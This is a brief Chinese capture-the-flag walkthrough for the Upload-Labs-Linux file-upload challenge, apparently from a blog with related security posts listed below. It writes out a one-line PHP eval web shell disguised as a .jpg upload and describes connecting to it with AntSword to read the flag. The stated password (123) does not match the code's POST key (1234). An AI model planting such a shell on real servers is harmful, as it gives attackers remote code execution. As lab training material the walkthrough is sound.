Upload-Labs-Linux

题目

1.打开靶机

随便上传一个图片,查看get请求发现**/upload/XXX.jpg**

2.创建一个脚本文件

命名为flag.php.jpg,并上传

脚本文件内容:

<?php @eval($_POST[1234])?>

3上传后复制文件get请求的链接并打开蚁剑

连接密码为123

双击链接

4,查找'/'在最下面找到flag文件

5,打开文件得到flag

相关推荐
NewCarRen4 小时前
汽车系统可靠性与技术融合:智能动力总成及机电一体化诊断
网络安全
-曾牛4 小时前
网络安全常见的框架漏洞
安全·web安全·网络安全·渗透测试·文件包含·漏洞复现·框架漏洞
YuanDaima20484 小时前
安全协议设计入门:原理与分析
人工智能·笔记·安全·网络安全·密码学·安全协议·课程
轻舟行718 小时前
常见的网站文件后缀名
web安全·网络安全
Cyyyy_g1 天前
【2025 SWPU-NSSCTF 秋季训练赛】WebFTP
安全·网络安全
平凡的学者1 天前
RustyKey
网络安全·hackthebox
unable code1 天前
攻防世界-Misc-pdf
网络安全·ctf·misc·1024程序员节
是Yu欸2 天前
【博资考5】网安2025
网络·人工智能·经验分享·笔记·网络安全·ai·博资考
jenchoi4132 天前
【2025-11-02】软件供应链安全日报:最新漏洞预警与投毒预警情报汇总
安全·web安全·网络安全
骥龙2 天前
2.4、恶意软件猎手:基于深度学习的二进制文件判别
人工智能·深度学习·网络安全